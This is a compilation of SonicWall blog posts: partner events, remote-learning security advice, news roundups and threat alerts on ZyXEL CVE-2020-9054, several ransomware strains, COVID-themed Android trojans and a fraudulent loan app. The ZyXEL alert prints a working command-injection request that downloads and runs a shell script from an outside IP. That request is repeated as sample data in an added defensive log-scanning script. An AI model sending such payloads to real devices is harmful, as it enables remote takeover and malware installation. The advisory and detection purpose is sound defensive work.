SonicWall EMEA 2020 Virtual Partner Events

We are excited to announce a series of Virtual 2020 Partner Events, starting in July – for members of our SecureFirst partner community and those interested in learning more about our SecureFirst partner program.

During these two- to four-hour events, you’ll have the opportunity to hear from SonicWall experts in your region as we share with you how SonicWall is uniquely positioned to help businesses and organizations everywhere mobilize for the new business normal.

We’ll cover a range of subjects from the newest SonicWall products, including SonicWall Switches and SD-Branch capabilities, all the way through to the most topical issues such as securing remote and mobile workforces. We’ll also be taking a look at how the SecureFirst Partner Program can be best utilized by our Partners to ensure their continued growth and success.

Our great lineup will ensure you leave this event feeling that your business is empowered and that your partnership with SonicWall is stronger than ever in these unprecedented times.

Book your virtual seat today!

Register now

If you are interested in attending an upcoming Partner Roadshow event in Europe or Africa, please reference the table below and register for a city near you.

Date    | Location                               | Registration Link
July 2  | France (French)                        | Register
July 3  | DACH (German)                          | Register
July 7  | Middle East, Africa & Turkey (English) | Register
July 7  | Romania (Romanian)                     | Register
July 7  | Spain (Spanish)                        | Register
July 8  | Italy (Italian)                        | Register
July 8  | UK & Nordics (English)                 | Register
July 9  | Portugal (English)                     | Register
July 9  | Benelux (English)                      | Register

Please note availability is limited and this event is targeted to the SonicWall Partner community.

More partner news

Keep up with partner news from SonicWall by following us on social media and by following our dedicated partner-focused Twitter account: @SNWLSecChannel

COVID-19 Ushers in a New Era of Cybersecurity

As colleges and universities approach the fall semester, COVID-19 has complicated cybersecurity measures.


This semester, higher-ed institutions around the world have struggled to keep up with the digital demands of remote learning. As these organizations build the infrastructure that will support distance learning moving forward, it’s more critical than ever for the education industry to consider the safety and security of its students and faculty members as we look ahead to how COVID-19 will continue to impact learning institutions.

College campuses have long been a target for cyber threat actors. In fact, EDUCAUSE reported that the number-one IT issue academic institutions face in 2020 is adopting a sound information security strategy. It’s no wonder, considering the rise in faculty and students bringing their own devices (BYOD) over the past decade, coupled with universities’ often insufficient funds to adequately secure campus networks.

And the amount of sensitive data that needs to be safeguarded has risen in lockstep with the number of devices. Academic institutions are a treasure trove of data — from student health and financial data, to faculty resumes and 401(k) information, to critical research and organizational data used to support U.S. companies and government agencies.

Now, in the age of COVID-19, all of this information is even more vulnerable as students and faculty access it via remote, at-home networks that often lag behind on-campus facilities in terms of security.

Academic institutions are aware that remote learning is likely here to stay for the foreseeable future, with campuses across the U.S. deciding to keep students home through the summer and even the fall semesters. With that expectation on the horizon, schools need to start making important decisions now about how to reinforce their IT security for the months ahead — especially when you consider the impact education has on communities, from job security for faculty and staff to talent development for the next generation of innovators.

Beyond the crisis, academic institutions must also consider how COVID-19 has forever changed the classroom environment. Once schools have made the necessary investments to bolster their IT and security infrastructure to support off-campus learning, is a 100% return to campus even viable?

Here are a few key strategies to help higher-ed institutions understand their critical cybersecurity infrastructure and protect remote learners and teachers from today’s greatest cyber threats, both now and going forward.

Remote learning’s biggest threats

As students and teachers across the U.S. wrap up the school year from home, academic institutions need to think critically about their biggest cybersecurity challenges, especially as summer classes approach and conversations about continuing remote learning into next fall ensue.

Emails, PDFs and Office documents, for example, are the most common threat vectors used by cybercriminals — and students can fall victim to social engineering, phishing attacks, ransomware and email fraud without the right protections in place. Similarly, as students receive instruction and emails from their schools and professors (and even the online learning platforms they use to complete assignments), they are not necessarily on high alert to keep an eye out for phishing scams. Data breaches are another serious risk, as students and professors increasingly use personal devices on remote networks.

At this time, it’s critical for academic institutions to understand the implications of a weak cybersecurity infrastructure and take critical steps to protect at-home users and endpoint devices. They must take it upon themselves to enhance cyber awareness throughout their organization and practice good cyber hygiene. This is not only important for protecting students’ sensitive data, but also for ensuring business continuity — particularly for higher education institutions where ongoing faculty communications, adviser roles and critical research must continue in between semesters.

Consider the cloud

Ironically, the sudden jump to remote learning coincides with the ongoing cloud business transformation. For higher-ed institutions — especially those with tighter IT budgets — the benefits of moving to the cloud are extensive, including cost savings, ubiquitous security coverage on and off campus, greater agility, maximum uptime and easy deployment.

This is especially critical for the storing and sharing of critical information developed by university researchers for business and government use. While universities must open up lab data and resources for students and faculty to continue their important research at home, it’s difficult to ensure that this information — previously reinforced by physical buildings and on-prem solutions — doesn’t fall into the hands of threat actors or nation-states.

With that, protecting students and faculty is central to defending these core resources. Academic institutions should consider deploying cloud-based security services to protect their entire organization from advanced email threats (regardless of location) and secure sensitive student and employee data by enforcing multifactor authentication, strong encryption, data protection and compliance policies.

Additionally, as schools plan to keep their doors closed for the summer and potentially fall semesters, they are naturally thinking about moving additional resources to the cloud. Given that students and faculty are prone to using Google and other file-sharing services that are typically not covered by network security infrastructure, academic institutions should consider deploying Cloud Access Security Brokers (CASBs) as an added layer of protection for sensitive information stored in and shared via the cloud.

Ensure strong endpoints

Finally, academic institutions should consider deploying endpoint protection capabilities to secure devices that connect and interact with school applications and data. Endpoint protection platforms are critical for protecting endpoint devices against malware and enabling continuous behavioral monitoring.

Because remote learning has required academic institutions to leverage productivity and collaboration applications like Slack and Zoom, school IT departments need real-time visibility of these applications and any vulnerabilities found on them in order to halt potential threats. This will enable school IT administrators to prioritize what applications to patch, and even enable blacklisting of processes that are launched by unauthorized applications — e.g., if students or professors seek tools or platforms that are not managed by the school. Visibility and control of applications is crucial, because threat actors will always be looking for vulnerable versions of applications running on user endpoints.

These are just a few strategies academic institutions and online learning platforms should consider as they look ahead to the next phases of the COVID-19 response and, potentially, continued remote learning. Reinforcing the cybersecurity infrastructure needs to be the number-one priority if these institutions want to maintain the trust and security of students and faculty long after the crisis is eradicated.

This blog originally appeared on the eCampus News website and is reposted with permission.

Hackers actively targeting remote code execution vulnerability on ZyXEL devices

SonicWall Capture Labs Threat Research team observed attackers actively targeting Zyxel NAS (Network Attached Storage) and firewall products affected by a remote code execution vulnerability.

Vulnerability | CVE-2020-9054

A NAS system is a storage device connected to a network that allows storage and retrieval of data from a centralized location for authorized network users and heterogeneous clients. ZyXEL NAS devices perform authentication using the weblogin.cgi program. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains an OS command, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. By sending a specially crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code with root privileges on the device.

We observe the hits below more often as attackers scan for vulnerable devices. The request sends the command “ls” in the username parameter; a vulnerable device returns without any error.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf"

On vulnerable devices, the attacker then sends the HTTP GET request below, which attempts to download a shell script to the “tmp” directory, execute the shell script “test.sh” and then remove it.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin;cd+%2Ftmp%3Bwget+http%3A%2F%2F62.171.171.24%2Ftest.sh%3Bsh+test.sh%3Brm+test.sh HTTP/1.1"

A quick search on Shodan shows a few hundred affected ZyXEL NAS devices exposed online.

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15005 ZyXEL Firewall/NAS Remote Code Execution
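As an added example (not SonicWall’s IPS signature and not Zyxel code), the following Python script applies the same check to ordinary web-server access logs: it flags requests to weblogin.cgi whose URL-decoded username parameter carries shell metacharacters. The log lines are constructed from the two requests quoted above plus a benign login; the Common Log Format layout and the documentation-range client addresses are assumptions.

```python
"""Flag access-log entries that look like CVE-2020-9054 probes of weblogin.cgi.

Added example, not SonicWall's IPS signature 15005 and not Zyxel code. It
applies the check the alert describes to ordinary web-server logs: a request
to weblogin.cgi whose URL-decoded username parameter carries shell
metacharacters. POST bodies are not written to access logs, so this only
catches the GET form of the attack; the POST form needs an IPS/WAF in front
of the device.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Common Log Format (assumed): ip ident user [timestamp] "request" status size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]*)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: \S+)?" '
    r'(?P<status>\d{3}) \S+'
)

# Characters the shell treats specially; none of them belongs in a login name.
SHELL_META = set(";&|`$(){}<>#'\"\\")


def parse_query(query: str) -> Dict[str, List[str]]:
    """Split a query string on '&' only and percent-decode each part once.

    Deliberately not urllib.parse.parse_qs: older Python releases also split
    on ';', which would cut 'admin;cd /tmp;wget ...' down to 'admin' and hide
    the injected commands from the check below.
    """
    params: Dict[str, List[str]] = {}
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def analyze_line(line: str) -> Optional[dict]:
    """Return a finding for a suspicious weblogin.cgi request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    if not path.endswith("/weblogin.cgi"):
        return None
    hits = [u for u in parse_query(query).get("username", [])
            if any(c in SHELL_META for c in u)]
    if not hits:
        return None
    return {"ts": m["ts"], "ip": m["ip"], "method": m["method"],
            "status": int(m["status"]), "username": hits[0]}


def scan_log(lines: List[str]) -> List[dict]:
    """Run analyze_line over every log line and collect the findings."""
    return [f for f in (analyze_line(l) for l in lines) if f is not None]


def probes_by_ip(findings: List[dict]) -> Dict[str, int]:
    """Count findings per client address, the raw material for a trend chart."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


# Constructed log lines: the two request lines quoted in the alert, a benign
# login and an unrelated page fetch. The 192.0.2.x and 203.0.113.x client
# addresses are made-up documentation-range values.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Jun/2020:10:01:02 +0000] "GET /adv,/cgi-bin/weblogin.cgi'
    '?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 200 512',
    '62.171.171.24 - - [26/Jun/2020:10:03:41 +0000] "GET /adv,/cgi-bin/weblogin.cgi'
    '?username=admin;cd+%2Ftmp%3Bwget+http%3A%2F%2F62.171.171.24%2Ftest.sh'
    '%3Bsh+test.sh%3Brm+test.sh HTTP/1.1" 200 512',
    '192.0.2.10 - - [26/Jun/2020:10:05:00 +0000] "GET /adv,/cgi-bin/weblogin.cgi'
    '?username=alice.smith&password=REDACTED HTTP/1.1" 200 512',
    '192.0.2.11 - - [26/Jun/2020:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['ip']} {f['method']} {f['status']} "
              f"username={f['username']!r}")
    print("probes per source:", probes_by_ip(found))
```

A status of 200 on these requests is consistent with the alert’s note that a vulnerable device returns without error, so the status field is worth keeping in the finding when triaging.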

Affected Products:

ZyXEL NAS products running firmware version 5.21 and earlier are affected by this vulnerability.

Users are recommended to install the standard firmware patches immediately. No updates are available for NAS products that have reached end-of-support; users of those devices are advised not to leave the product directly exposed to the internet. If possible, connect it behind a security router or firewall for additional protection.

Find vendor advisory here

IOC:

Attacker IP’s:

Cybersecurity News & Trends – 06-26-20

Hackers made inroads this week with zero-day threats, massive DDoS attacks and point-of-sale compromises — but there were significant wins for the good guys, too.


SonicWall Spotlight

CEO Outlook 2020 – Bill Conner — CRN

  • CRN recently asked 80 of the industry’s top CEOs — including SonicWall’s Bill Conner — why 2020 will be the launch of the data decade.

MSPs will be forced to fix ‘rushed out’ remote working solutions post-COVID – Sonicwall CEO — Channel Partner Insight

  • In an interview with CPI, Bill Conner explained that as changes to work patterns are likely to outlast the pandemic, pivoting out of lockdown will mean some of the earlier “temporary” remote working solutions will need to be re-engineered.

The Tel Aviv Tech Startups that are Solving COVID-19 Challenges — Forbes

  • Tel Aviv-based Perimeter 81, a provider of network security-as-a-service that recently completed a $10 million Series A led by SonicWall and existing investors, offers solutions that replace traditional VPNs.

Cybersecurity News

FBI warns K-12 schools of ransomware attacks via RDP — ZDNet

  • The FBI has issued a security alert warning K-12 schools about ransomware gangs abusing RDP connections to break into school systems.

There are DDoS attacks, then there’s this 809 million packet-per-second tsunami Akamai says it just caught — The Register

  • The attack, which targeted an unspecified European bank, was the largest such attack Akamai had ever encountered — and the CDN believes it may be the largest DDoS attack to hit any network, ever.

This ransomware has learned a new trick: Scanning for point of sales devices — ZDNet

  • Already one of the most dangerous forms of ransomware, Sodinokibi now looks like it could be attempting to make money from stolen payment information, too.

FBI sees major spike in coronavirus-related cyber threats — The Hill

  • The FBI’s Internet Crime Complaint Center (IC3) has received 20,000 coronavirus-related cyber threat reports this year — as many as it received in all of 2019.

Republicans propose bill to end ‘warrant-proof’ encryption — The Washington Times

  • Republicans on the Senate Judiciary Committee introduced a bill Tuesday taking on the encryption technology that major tech companies use to secure customer data.

New WastedLocker ransomware demands payments of millions of USD — ZDNet

  • Evil Corp, one of the biggest malware operations on the planet, has returned to life with a new ransomware strain.

Ransomware operators lurk on your network after their attack — Bleeping Computer

  • While many believe attackers quickly deploy ransomware and leave so they won’t get caught, in reality threat actors are not so quick to give up a resource that they worked so hard to control.

Phishing and cryptocurrency scams squashed as one million emails are reported to new anti-scam hotline — ZDNet

  • In the two months since its launch, the UK’s new anti-scam hotline has received an average of 16,500 emails per day, resulting in 10,000 links to online scams either blocked or taken down by authorities.

Hacker arrested for stealing, selling PII of 65K hospital employees — Bleeping Computer

  • 29-year-old Justin Sean Johnson has been arrested for allegedly stealing PII and W-2 information for over 65,000 University of Pittsburgh Medical Center employees and selling it on the dark web.

Security surprise: Four zero-days spotted in attacks on researchers’ fake networks — ZDNet

  • Previously unknown attacks used against fake systems highlight big problems with industrial systems security.

In Case You Missed It

Cobralocker ransomware actively spreading in the wild

The SonicWall Capture Labs threat research team observed reports of a new variant family of COBRALOCKER ransomware [COBRALOCKER.RSM] actively spreading in the wild.

The COBRALOCKER ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. <Cobra>

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all the files and appends the [Cobra] extension onto each encrypted file’s filename.

During our analysis, we noticed that the malware uses the following key to encrypt the victim’s files (see source code below).

This makes it easier for us to create a decryptor tool for COBRALOCKER.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signature:

  • GAV: COBRALOCKER.RSM (Trojan)

A Brief History of COVID-19 Related Attacks, Pt. 1

As the world manages voluntary quarantines, mandated isolations, social distancing and “shelter-at-home” edicts, cybercriminals are busy creating malware and other cyberattacks that prey on the fear surrounding the novel coronavirus epidemic (COVID-19).

“More than ever, the public needs to be hyper-aware of the interactions they have online, particularly involving the links and emails they open,” SonicWall Vice President Terry Greer-King told The Sun. “Cybercriminals do their utmost to take advantage of trying times by tricking users into opening dangerous files, through what they consider to be trusted sources.”

While SonicWall Capture Labs threat researchers are constantly investigating and analyzing all threats, the team has flagged the top cyberattacks that leverage coronavirus and COVID-19 to take advantage of human behavior. Here are some of the earliest:

Malicious Archive File: February 5, 2020

In early February, SonicWall Capture Labs used patent-pending Real-Time Deep Memory Inspection (RTDMI) to detect an archive file containing an executable file named CoronaVirus_Safety_Measures.exe. The archive is delivered to the victim’s machine as an email attachment.

After analyzing the executable file, SonicWall found that the file belongs to the GOZ InfoStealer family, which was first detected by SonicWall RTDMI in November 2019.

The GOZ InfoStealer is known for stealing user data from installed applications, along with victims’ system information, which is then sent to the threat actor over Simple Mail Transfer Protocol (SMTP).

The malware author is continuously updating the malware code and changing its infection chain. Details of this analysis are available in this SonicAlert: “Threat Actors Are Misusing Coronavirus Scare To Spread Malicious Executable.”

Coronavirus-Themed Android RAT: February 26, 2020

SonicWall Capture Labs observed a coronavirus scare tactic being used in the Android ecosystem in the form of a Remote Access Trojan (RAT), which is an Android apk that simply goes by the name coronavirus.

After installation and execution, this sample requests that the victim re-enter the pin/pattern on the device and steals it while repeatedly requesting ‘accessibility service’ capabilities.

Upon viewing the code structure (below), it becomes apparent that some form of packing/encoding is being used in this sample. The class names appear random, but have a structure in themselves; most class names are of similar length and equally random.

On inspecting the Manifest.xml files, most of the activities listed are unavailable in the decompiled code. This indicates that the ‘real’ class files will be decrypted during runtime. This is a mechanism that makes it difficult for automated tools to analyze the code and give a verdict.

Details of this analysis are available in this SonicAlert: “Coronavirus-themed Android RAT on the Prowl.”

SonicWall Capture Labs provides protection against these threats with the following signatures:

  • AndroidOS.Spyware.RT (Trojan)
  • AndroidOS.Spyware.DE (Trojan)

COVID-19 Hoax Scareware: March 13, 2020

SonicWall Capture Labs threat researchers observed malware taking advantage of coronavirus (COVID-19) fears, also known as ‘scareware.’ The sample pretends to be ransomware by displaying a ransom note (shown below). In reality, however, it does not encrypt any files.

To scare the victim, a number of security warning messages are displayed:

In the end, the malware is benign and hopes fear and human behavior will force victims into paying the ransom. Details of this analysis are available in this SonicAlert: “COVID-19 Hoax Scareware.”

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Scareware.CoVid_A (Trojan)

Malicious “Marketing Campaign” Propagates Android RAT: March 14, 2020

SonicWall Capture Labs threat researchers discovered and analyzed malicious campaign websites that currently serve (at the time of publication) an Android Remote Access Trojan (RAT) belonging to the same family discovered in February 2020 (see above).

Cyberattackers are creating websites that spread misinformation about coronavirus (COVID-19), falsely claiming ways to “get rid of” the novel virus. Instead, the sites attract new victims via download links.

SonicWall found two main variants of this strategy, one in English and another in Turkish. Both serve an apk named corona.apk when the victim clicks on the Google Play image.

Upon downloading the apk file and examining the code, SonicWall found a similar structure to the variant outlined in February. This sample is an Android Remote Access Trojan (RAT) and can perform a number of malicious operations, including:

  • Get information about the device
  • Get a list of apps installed
  • Allow remote control of the device via TeamViewer
  • Steal Gmail password and/or lock pattern
  • Keylogger
  • Upload files
  • Steal SMS messages, contacts
  • Disable Play Protect

There is a lot of misinformation and panic surrounding coronavirus (COVID-19). SonicWall Capture Labs reiterates that there are no mobile apps that can track coronavirus infections or point to a vaccine. Please exercise extreme caution.

Details of this analysis are available in this SonicAlert: “Misinformation Related to Coronavirus Being Used to Propagate Malicious Android RAT.”

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • Spyware.RT (Trojan)
  • Spyware.DE (Trojan)

12-Layer Azorult.Rk: March 16, 2020

SonicWall Capture Labs threat researchers found a new sample and activity for the “coronavirus” binary Azorult.Rk. Malware authors have taken advantage of the public’s desire for information on the COVID-19 pandemic since it was first discovered in December 2019 — and it has only escalated since.

Azorult.Rk masquerades as an application providing diagnosis support, even including a screenshot of a popular interactive tool that maps COVID-19 cases and exposure. It includes 12 different layers of static and dynamic information, making it difficult for threat analysts to quickly investigate. This specific analysis serves as a strong primer on how malware authors mask their motives and tactics.

After sorting through the layers, SonicWall found the malware eventually attempted to transmit statistics and metrics of the physical machine hardware, as well as usernames, hostnames and much more.

Details of this analysis are available in this SonicAlert: “Coronavirus, COVID-19 & Azorult.Rk.”

SonicWall Capture Labs provides protection against this threat with the following signature:

  • GAV: Azorult.RK

Coronavirus Ransomware: March 19, 2020

SonicWall Capture Labs threat researchers have observed a new ransomware threat leveraging coronavirus fear. This ransomware encrypts and zips the files and renames them ‘coronaVi2022@protonmail.ch__<filename>’. It then changes the drive name to coronavirus and drops coronavirus.txt in every folder of the infected system.

After modifying registry keys, it adds new keys and shows users the following ransom message:

After 20 minutes, it restarts the victim machine and displays yet another ransom note.

Additional details of this analysis are available in this SonicAlert: “Coronavirus Ransomware.”

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • GAV: CoronaVirus.RSM_2
  • GAV: CoronaVirus.RSM

Work-from-Home VPN Solutions for Remote Workforces

To help organizations cost-effectively implement VPN technology for their rapidly expanding work-from-home employees, SonicWall is making its remote access products and services available to both new and existing customers at deeply discounted rates. We’re also bundling critical security solutions for new enterprise and SMB customers.

This special offer provides free Secure Mobile Access (SMA) virtual appliances sized for enterprises and SMBs, and also includes 50% discounts on Cloud App Security and Capture Client endpoint protection when paired with SMA.

These packages were bundled to include everything needed to protect employees outside the network:

Fraudsters victimizing innocent users through a dubious Android finance app

The COVID-19 pandemic has created a global crisis, and threat actors have worsened the situation by unleashing their malicious handiwork.

The SonicWall Capture Labs threat research team has been blogging regularly about malware threats leveraging the current COVID-19 pandemic. SonicWall has found another Android app using this theme. The app was for some time distributed via the Google Play Store; it has since been removed from the Play Store after we reported it to the concerned team.

The app, named Cashbox, is categorized as a Finance app. It targets Indian Android phone users and is portrayed as an app that helps customers get a loan. The high number of installs indicates that a large number of users may have been victimized:

The fraudulent app seems to have passed unnoticed by security solutions, as illustrated by the fact that no AV vendor on the popular threat intelligence sharing portal VirusTotal detects it:

The app promises easy loans to customers. The app description contains loan EMI and interest details, as shown below:

After installation, it shows a list of required permissions. Interestingly, the app prompts the user to grant permissions by describing why each permission is required:

The user must provide the loan amount first; eventually, the app asks for the PAN (Permanent Account Number) card and a self-photo taken with the phone camera to be uploaded:

Thereafter, the user is informed that authentication is complete, and the user’s name, PAN card number and date of birth are displayed to look genuine, which reduces suspicion:

Next, it asks the user to make a payment of Rs. 99 through any of four options, Card, UPI, Wallets or Net Banking, as shown below:

Then, other loan-facilitating apps are recommended:

    Recommended apps

All the personal information is requested again if the user decides to use any of the recommended apps. Users are first promised easy loans, but in return their personal information is stolen and a new loan app is recommended.

Reviews shared by some users of the fraudulent app reflect their frustration:

The code snippet below indicates that the app fetches the user’s location and device information as well:

SonicWall Capture Labs provides protection against this threat with the following signature:

Android_FraudApp.A (Trojan)

Indicators Of Compromise (IOC’s):

1ab6fe4483a77ccffe9876d5426822a57037d6a890382666442342b2704464bb

SonicWall’s Online Community Connects Cybersecurity Professionals

SonicWall recently launched an online community to connect like-minded professionals from around the world. Since the launch, there have been nearly a thousand users who have interacted with one another, each contributing and helping through their own unique technical expertise, personal knowledge and experience.

But what is a community? Gartner defines a community as “a constantly changing group of people collaborating and sharing their ideas over an electronic network.” By bringing together a group of people with a common interest, providing a platform for addressing many readers at once, and facilitating communication in real time, Gartner says, communities are able to optimize their collective power.

We’ve seen this definition come to life with the launch of SonicWall Community—and the benefits are already becoming clear:

  • Exchanging best practices for lowering total cost of ownership through SonicWall solutions.
  • Learning how to maximize the value of SonicWall products.
  • Connecting with product management and support to ask questions, get help or submit an idea.
  • Sharing your experience and expertise with other SonicWall users.

A Truly Engaging Community

At its core, the community enables cybersecurity professionals to connect with one another in relevant and meaningful ways. The community is a place to ask questions, start new discussions, and collaborate with experts from across a variety of industries.

Customers and partners with questions have received relevant and helpful responses by both SonicWall staff and experienced professionals in the field. Members have come together to solve difficult problems. Through collective brainstorming and creativity, issues that may have taken a few days are now solved in half the time.

The community is easy to use and features a variety of ways to find meaningful content. Take advantage of the built-in search to find relevant posts, view the latest discussions, or select from a wide variety of solution categories.

And with the real-time notification option, it’s easy to know when one of your questions has received a response. You can also choose to stay up to date on product notifications, user mentions, issues found in the wild, and more.

The community even has a developer hub for in-depth technical discussions, as well as a virtual “water cooler” to take a break to swap ideas and connect with peers.

The best part about joining the community is that it gives you free, 24/7 access to a wealth of knowledge — and getting started is easy. Simply navigate to community.sonicwall.com and sign in with your existing MySonicWall credentials to start participating. If you don’t have a MySonicWall account, that’s OK. It’s free to create one and takes just a few minutes to sign up.

Join SonicWall Community

Whether you’re just getting started with SonicWall products or you’ve been with us for years, the SonicWall community has something to offer. And if you choose to share your own unique knowledge and experience, you have the potential to help countless others.

Come join the conversation now at community.sonicwall.com.

Cybersecurity News & Trends – 06-19-20

This week, SonicWall’s new Switches and Secure SD-Branch made waves, hackers made a stronger Qbot, and attacks on AWS made history.


SonicWall Spotlight

ChannelPro 5 Minute Roundup — ChannelPro Network

  • Erick and Rich of ChannelPro explore the far-reaching implications of SonicWall’s new branch office networking solution, which they say arrived at a great time for businesses.

SonicWall Launches New Network Switches — Enterprise Times

  • SonicWall has announced a range of new products, including new multi-gigabit switches and an SD-Branch solution.

SonicWall Advances Network Edge Security, Adds Multi-gigabit Switch Series and New SD-Branch Capabilities — TMCnet

  • TMCnet highlights SonicWall’s momentum over the past quarter, including the release of new and enhanced MSSP offerings and the launch of its SD-Branch capabilities.

SonicWall takes threat protection to the branch level — MicroScope

  • This article covers SonicWall’s latest SD-Branch offering as a major shift and a milestone in its corporate history, one that is set to have a major impact on the security player’s channel.

Cybersecurity News

Researchers Expose a New Vulnerability in Intel’s CPUs — Wired

  • Modern CPUs — particularly those made by Intel — have been under siege in recent years by an unending series of attacks. Now, two separate academic teams have disclosed two new and distinctive exploits that pierce Intel’s Software Guard eXtensions (SGX), by far the most sensitive region of the company’s processors.

Google Sees Increase in COVID-19 Phishing in Brazil, India, UK — Security Week

  • Cyberthreats taking advantage of the COVID-19 pandemic are evolving, and Google is seeing an increase in related phishing attempts in some countries.

Attackers impersonate secure messaging site to steal bitcoins — Bleeping Computer

  • In what can be described as the case of both cybersquatting and phishing, threat actors have created a site that imitates the legitimate secure note sharing service privnote.com to steal bitcoins.

Coder-Turned-Kingpin Paul Le Roux Gets His Comeuppance — Wired

  • Paul Le Roux, 47 — who faced up to a life sentence after pleading guilty to crimes ranging from methamphetamine trafficking to selling weapons technology to Iran — has been sentenced to 25 years in federal prison.

Targeting U.S. banks, Qbot trojan evolves with new evasion techniques — SC Magazine

  • By malware standards, the banking trojan Qbot is long in the tooth, but it still has some bite, according to researchers who say it has added some detection and research evasion techniques to its arsenal.

Hackers Trigger Far-Reaching Disruption by Targeting Low-Profile Firm — The Wall Street Journal

  • Small and midsize companies are fighting a rising tide of cyberattacks largely out of public view, posing an underappreciated risk for the bigger companies and institutions that use their services.

Google Alerts catches fake data breach notes pushing malware — Bleeping Computer

  • Fraudsters have begun pushing fake data breach notifications using big company names to distribute malware and scams. They’re mixing black SEO, Google Sites, and spam pages to direct users to dangerous locations.

Exclusive: Massive spying on users of Google’s Chrome shows new security weakness — Bloomberg

  • A newly discovered spyware effort attacked users through 32 million downloads of extensions to Google’s Chrome web browser, highlighting the tech industry’s failure to protect browsers despite their increasing use for email, payroll and other sensitive functions.

AWS said it mitigated a 2.3 Tbps DDoS attack, the largest ever — ZDNet

  • The previous record for the largest DDoS attack ever recorded was of 1.7 Tbps, recorded in March 2018.

In Case You Missed It

Fake ransomware decryptor spreads Zorab ransomware

SonicWall Capture Labs threat research team observed Zorab ransomware posing as a DJVU ransomware decryptor.

When a user’s files are encrypted by ransomware, they desperately look for a tool to decrypt the files instead of paying the ransom. One such supposed decryptor, DecryptorDjvuMlagham.exe, does not remove the DJVU ransomware infection; instead, it spreads Zorab ransomware.

Infection cycle

Upon launching the application, it opens a console and asks for relevant information.

However, it accepts any input and does not validate it.

Once you click Start Scan, instead of scanning it extracts another executable called crab[.]exe into users\AppData\Local\Temp.

Disassembling the code, one can see that crab.exe is extracted on the button click.

This executable then starts encrypting files; the encrypted files are given the extension .ZRB.
It also encrypts files that were already encrypted by the earlier infection and changes their extension to .ZRB.

The attacker drops a ransom note called -DECRYPT~ZORAB.txt in each folder.

The ransom note reads as follows and boasts that this is just a business and that they don’t care about the victim. It also instructs the victim to email zorab28@protonmail.com for information about how to decrypt the files.

At the time of writing this alert, we had not yet received a response to the email that we sent to the attacker.
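As an added example (not SonicWall’s code), the following Python triage script walks a directory tree for the on-disk indicators described above: files renamed to .ZRB, files that still carry a second extension before .ZRB (the double-encryption behaviour), and the -DECRYPT~ZORAB.txt note in each folder. The constructed sample tree, the `.djvu` extension used in it, and the double-extension heuristic are assumptions made for the demonstration.

```python
"""Added example, not SonicWall's code: triage a directory tree for the
Zorab indicators described above (.ZRB extension, files that already bore
another ransomware extension before .ZRB was appended, and the
-DECRYPT~ZORAB.txt note dropped in each folder)."""
import os
import tempfile
from pathlib import Path

ZRB_EXT = ".ZRB"
NOTE_NAME = "-DECRYPT~ZORAB.txt"


def scan_for_zorab(root):
    """Walk root; return relative paths for each indicator class."""
    root = Path(root)
    found = {"zrb_files": [], "double_encrypted": [], "note_dirs": []}
    for dirpath, _, filenames in os.walk(root):
        d = Path(dirpath)
        if NOTE_NAME in filenames:
            found["note_dirs"].append(str(d.relative_to(root)))
        for name in filenames:
            if not name.upper().endswith(ZRB_EXT):
                continue
            rel = str((d / name).relative_to(root))
            found["zrb_files"].append(rel)
            # Heuristic (assumption): after stripping .ZRB, a second trailing
            # extension (e.g. thesis.docx.djvu.ZRB) means the file had already
            # been encrypted by the earlier infection and was renamed again.
            if len(Path(name[:-len(ZRB_EXT)]).suffixes) >= 2:
                found["double_encrypted"].append(rel)
    return found


def zorab_present(found):
    """Note plus .ZRB files together match the behaviour the alert describes."""
    return bool(found["note_dirs"]) and bool(found["zrb_files"])


def build_sample_tree():
    """Constructed sample tree (not a real capture) mimicking the alert."""
    root = Path(tempfile.mkdtemp(prefix="zorab_demo_"))
    docs = root / "Documents"
    docs.mkdir()
    for folder in (root, docs):  # note dropped in every folder
        (folder / NOTE_NAME).write_text("constructed stand-in for the note\n")
    (docs / "budget.xlsx.ZRB").write_bytes(b"\0" * 16)
    (docs / "thesis.docx.djvu.ZRB").write_bytes(b"\0" * 16)  # encrypted twice
    (root / "readme.txt").write_text("untouched\n")
    return root


if __name__ == "__main__":
    print(scan_for_zorab(build_sample_tree()))
```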

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Zorab.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.